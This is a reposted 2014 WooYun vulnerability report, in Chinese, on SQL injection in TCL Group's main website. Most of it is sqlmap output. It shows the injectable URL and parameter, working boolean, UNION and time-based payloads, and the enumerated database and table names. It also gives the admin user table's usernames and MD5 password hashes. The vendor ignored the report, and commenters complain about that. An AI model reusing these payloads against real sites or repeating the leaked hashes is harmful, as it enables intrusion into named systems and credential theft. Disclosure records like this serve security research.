TCL集团股份有限公司主站之SQL注射(管理数据泄漏)

admin 2015年6月21日19:53:53评论255 views字数 227阅读0分45秒阅读模式
摘要

2014-09-23: 细节已通知厂商并且等待厂商处理中
2014-09-23: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-09-29: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(5) 关注此漏洞

缺陷编号: WooYun-2014-77096

漏洞标题: TCL集团股份有限公司主站之SQL注射(管理数据泄漏)

相关厂商: TCL集团财务有限公司

漏洞作者: ydasn

提交时间: 2014-09-23 19:13

公开时间: 2014-09-29 17:58

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏


漏洞详情

披露状态:

2014-09-23: 细节已通知厂商并且等待厂商处理中
2014-09-23: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-09-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

TCL集团股份有限公司主站之SQL注射一枚

详细说明:

TCL集团股份有限公司主站之SQL注射一枚

漏洞证明:

注入点:http://www.tcl.com/News/detail.html?nid=891

Place: GET

Parameter: nid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: nid=891 AND 4308=4308

Type: UNION query

Title: MySQL UNION query (NULL) - 5 columns

Payload: nid=891 LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a7066703a,

0x716a4652456464766467,0x3a686a6b3a), NULL, NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: nid=891 AND SLEEP(5)

web application technology: Nginx

back-end DBMS: MySQL 5.0.11

available databases [3]:

[*] information_schema

[*] tclcms

[*] test

current database: 'tclcms'

current user: '%'

Database: tclcms

[26 tables]

+--------------------------+

| t_about |

| t_development |

| t_email_subscriptions |

| t_investors |

| t_mall_index |

| t_maps |

| t_maps_area |

| t_maps_city |

| t_maps_province |

| t_multimedia |

| t_news |

| t_news_type |

| t_product |

| t_query |

| t_recruitment |

| t_recruitment_enterprise |

| t_series |

| t_series_category |

| t_series_models |

| t_service |

| t_sys_menu |

| t_sys_role |

| t_sys_rolemenu |

| t_sys_roleuserinf |

| t_sys_userinf |

| t_weibo |

+--------------------------+

Database: tclcms

Table: t_sys_userinf

[7 columns]

+-----------------+-------------+

| Column | Type |

+-----------------+-------------+

| active | tinyint(1) |

| createtime | datetime |

| last_login_date | datetime |

| loginname | varchar(50) |

| password | varchar(50) |

| userinfid | int(11) |

| username | varchar(50) |

+-----------------+-------------+

Database: tclcms

Table: t_sys_userinf

[4 entries]

+----------+----------------------------------+

| username | password |

+----------+----------------------------------+

| admin | 6b6b5078b4d67ee55259d1ae59cec7f3 |

| ??????? | 25d55ad283aa400af464c76d713c07ad |

| ?? | 25d55ad283aa400af464c76d713c07ad |

| ?? | 8a49a955ba28a7ac0cce7a916b8eec38 |

+----------+----------------------------------+

虽然3个乱码不过admin不会 搜噶

修复方案:

过滤!

版权声明:转载请注明来源 ydasn@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-29 17:58

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-09-23 20:03 | 第四维度 ( 实习白帽子 | Rank:90 漏洞数:45 | 将点成线...)

    0

    mark

  2. 2014-09-23 20:19 | T0sk ( 实习白帽子 | Rank:34 漏洞数:27 | 低调求发展!)

    0

    大牛好

  3. 2014-09-24 09:41 | 紫霞仙子 TCL集团股份有限公司主站之SQL注射(管理数据泄漏) ( 普通白帽子 | Rank:2302 漏洞数:307 | 没好团队,啥都干不成!!!)

    0

    TCL一直在忽略,目测这个也是。

  4. 2014-09-24 11:51 | T0sk ( 实习白帽子 | Rank:34 漏洞数:27 | 低调求发展!)

    0

    @紫霞仙子 管理数据表帐号密码数据库都列了 还拒绝吗

  5. 2014-09-24 14:39 | 紫霞仙子 TCL集团股份有限公司主站之SQL注射(管理数据泄漏) ( 普通白帽子 | Rank:2302 漏洞数:307 | 没好团队,啥都干不成!!!)

    0

    @T0sk 有时候shell了都忽略。

  6. 2014-09-24 19:33 | T0sk ( 实习白帽子 | Rank:34 漏洞数:27 | 低调求发展!)

    0

    好吧 我知道了

  7. 2014-09-25 09:46 | 紫霞仙子 TCL集团股份有限公司主站之SQL注射(管理数据泄漏) ( 普通白帽子 | Rank:2302 漏洞数:307 | 没好团队,啥都干不成!!!)

    0

    @T0sk 都2天过去了。。。。。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin